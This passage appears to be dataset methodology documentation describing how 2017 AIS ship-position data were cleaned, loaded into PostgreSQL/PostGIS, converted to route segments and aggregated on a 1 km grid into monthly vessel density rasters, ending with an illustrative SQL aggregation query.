the ship-satellite co-visibility were flagged as invalid.
The AIS data were converted from their original format (NMEA) to CSV, and split into 12 files, each corresponding to a month of 2017. Overall the pre-processed dataset included about 1.9 billion records. Upon importing the data into a database, it emerged that some messages still contained invalid characters. By running a series of commands from a Linux shell, all invalid characters were removed. The data were then imported into a PostgreSQL relational database. By querying the database it emerged that some MMSI numbers are associated with more than one ship type during the year. To cope with this issue, we created a unique MMSI/ship type register where we attributed to each MMSI the most recurring ship type. The admissible ship types reported in the AIS messages were grouped into macro categories: 0 Other, 1 Fishing, 2 Service, 3 Dredging or underwater ops, 4 Sailing, 5 Pleasure Craft, 6 High speed craft, 7 Tug and towing, 8 Passenger, 9 Cargo, 10 Tanker, 11 Military and Law Enforcement, 12 Unknown and All ship types.
The subsequent step consisted of creating points representing ship positions from the AIS messages. This was done through a custom-made script for ArcGIS developed by Lovell Johns. Another custom-made script reconstructed ship routes (lines) from the points, by using the MMSI number as a unique identifier of a ship. The script created a line for every two consecutive positions of a ship. In addition, for each line the script calculated its length (in km) and its duration (in hours) and appended them both as attributes to the line. If the distance between two consecutive positions of a ship was longer than 30 km or if the time interval was longer than 6 hours, no line was created.
Both datasets (points and lines) were projected into the ETRS89/ETRS-LAEA coordinate reference system, used for statistical mapping at all scales, where true area representation is required (EPSG: 3035). The lines obtained through the ArcGIS script were then intersected with a custom-made 1km*1km grid polygon (21 million cells) based on the EEA's grid and covering the whole area of interest (all EU sea basins). Because each line had length and duration as attributes, it was possible to calculate how much time each ship spent in a given cell over a month by intersecting line records with grid cell records in another dedicated PostgreSQL database. Using the PostGIS Intersect tool, for each cell of the grid, we then summed the time value of each 'segment' in it, thus obtaining the density value associated with that cell, stored in calculated PostGIS raster tables. Density is thus expressed in hours per square kilometre per month. The final step consisted of creating raster files (TIFF file format) with QuantumGIS from the PostgreSQL vessel density tables. Annual average rasters by ship type were also created. The dataset was clipped according to the National Marine Planning Framework (NMPF) assessment area.
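The per-cell aggregation described above can be sketched in SQL roughly as follows; the table and column names (grid, ship_lines, cell_id, geom, duration_hours) are illustrative assumptions, not the names used in the original EMODnet database:
-- sum the time spent by all route segments intersecting each grid cell
SELECT g.cell_id,
       SUM(l.duration_hours) AS hours_per_cell
FROM grid AS g
JOIN ship_lines AS l
  ON ST_Intersects(g.geom, l.geom)
GROUP BY g.cell_id;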